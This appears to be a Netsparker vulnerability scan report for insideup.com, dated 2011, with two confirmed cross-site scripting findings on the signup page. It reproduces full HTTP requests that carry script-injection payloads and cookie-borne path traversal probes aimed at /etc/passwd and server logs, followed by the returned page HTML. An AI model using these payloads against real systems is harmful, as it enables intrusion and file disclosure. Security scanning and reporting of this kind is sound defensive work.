<form method="post" action="/whitePapaper.html"> <input type="hidden" name="src" value="'"--></style></script><script>netsparker(0x0004C7)</script>"> <input type="hidden" name="iusrc" value="3"> <input type="hidden" name="parentPage" value="3"> <table width="284" border="0" cellpadding="0" cellspacing="0" style="background-color:#ededed;"> <tr> <td colspan="2" class="head"> To get more information and receive a free copy of white paper "What Every Business Service Marketer Should Know about Online Lead Generation," simply complete the form below: </td> </tr> <tr> <td style="width:100px;">First Name</td> <td style="text-align:left;"> <input name="firstName" type="text" value="Smith"/> </td> </tr> <tr> <td>Last Name</td> <td> <input name="lastName" type="text" value="Smith"/> </td> </tr> <tr> <td>Company</td> <td> <input name="company" type="text" value="3"/> </td> </tr> <tr> <td>Phone Number</td> <td> <input name="phone" type="text" value="3"/> </td> </tr> <tr> <td>Email Address</td> <td> <input name="email" type="text" value="netsparker@example.com"/> </td> </tr> <tr> <td>Website</td> <td> <input name="url" type="text" value="3"/> </td> </tr> <tr> <td>Your Company's <br> Services?</td> <td> <input name="companyServices" type="text" value="3"/> </td> </tr> <tr> <td>&..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
companyName POST Smith
emailAddress POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x0004D5)</script>
lastName POST Smith
password1 POST 3
password2 POST 3
pseudonym POST 3
receiveSpecialOfferEmail POST netsparker@example.com
refererUrl POST http://www.insideup.com/index.html
termsOfService POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 323
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

companyName=Smith&emailAddress=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004D5)%3c%2fscript%3e&lastName=Smith&password1=3&password2=3&pseudonym=3&receiveSpecialOfferEmail=netsparker%40example.com&refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&termsOfService=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:49 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=6A836EF41DEA790792C5633FD9018675; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> <form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='http://www.insideup.com/index.html'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <td> <input type="text" name="emailAddress" value="netsparker@example.com" id="emailAddress" style="width..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
_rememberme POST 3
password POST password
refererUrl POST '"--></style></script><script>alert(0x0004D9)</script>
rememberme POST true
username POST username

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 162
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

_rememberme=3&password=password&refererUrl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004D9)%3c%2fscript%3e&rememberme=true&username=username

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:21:53 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=FEA569566541D6A27921A659561BB3E0; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
